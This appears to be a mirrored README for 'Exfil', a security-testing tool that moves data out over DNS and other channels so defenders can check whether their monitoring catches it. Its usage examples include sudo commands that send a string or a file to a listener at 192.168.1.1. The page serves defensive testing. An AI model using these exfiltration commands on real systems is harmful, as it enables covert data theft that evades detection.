Giter VIP home page Giter VIP logo

exfil's Introduction

Exfil

Overview

Exfil is a tool designed to exfiltrate data using various techniques, which allows a security team to test whether its monitoring system can effectively catch the exfiltration. The idea for Exfil came from a Twitter conversation between @averagesecguy, @ChrisJohnRiley, and @Ben0xA and was sparked by the TrustWave POS malware whitepaper available at https://gsr.trustwave.com/topics/placeholder-topic/point-of-sale-malware/.

###Workflow

  1. A tester starts up a listener on one side of the monitoring system, specifying the exfiltration method.
  2. The tester then starts up a sender on the other side of the monitoring system, specifying the data to transmit and the exfiltration method.
  3. The sender then transmits the specified data to the listener while the tester attempts to see the data exfiltration using the monitoring system.

Prerequisites

  • dnslib - pip install dnslib
  • dpkt - Download the source code from Google Code. Once dowloaded extract the tar file and run python setup.py install

Modules

Usage

usage: exfil.py [-h] (-d string | -f filename) (-l | -s server) [-p port] module_name

Exfiltrate data.

positional arguments:
  module_name  Exfiltration module to use.

optional arguments:
  -h, --help   show this help message and exit
  -d string    String of data to exfiltrate.
  -f filename  File to send.
  -l           Listen for a connection.
  -s server    Server where data should be sent. Can be a hostname
  or an IP address.
  -p port      Port to use when listening or connecting.

Examples

  • Start a DNS listener on port 5353: sudo ./exfil.py -l -p 5353 -m dns_lookup
  • Send a string of data to the server at 192.168.1.1 listening on port 5353: sudo ./exfil.py -s 192.168.1.1 -p 5353 -d "String of data" -m dns_lookup
  • Send the file exfil.py to the server at 192.168.1.1 listening on port 5353: sudo ./exfil.py -s 192.168.1.1 -p 5353 -f exfil.py -m dns_lookup

exfil's People

Contributors

averagesecurityguy avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.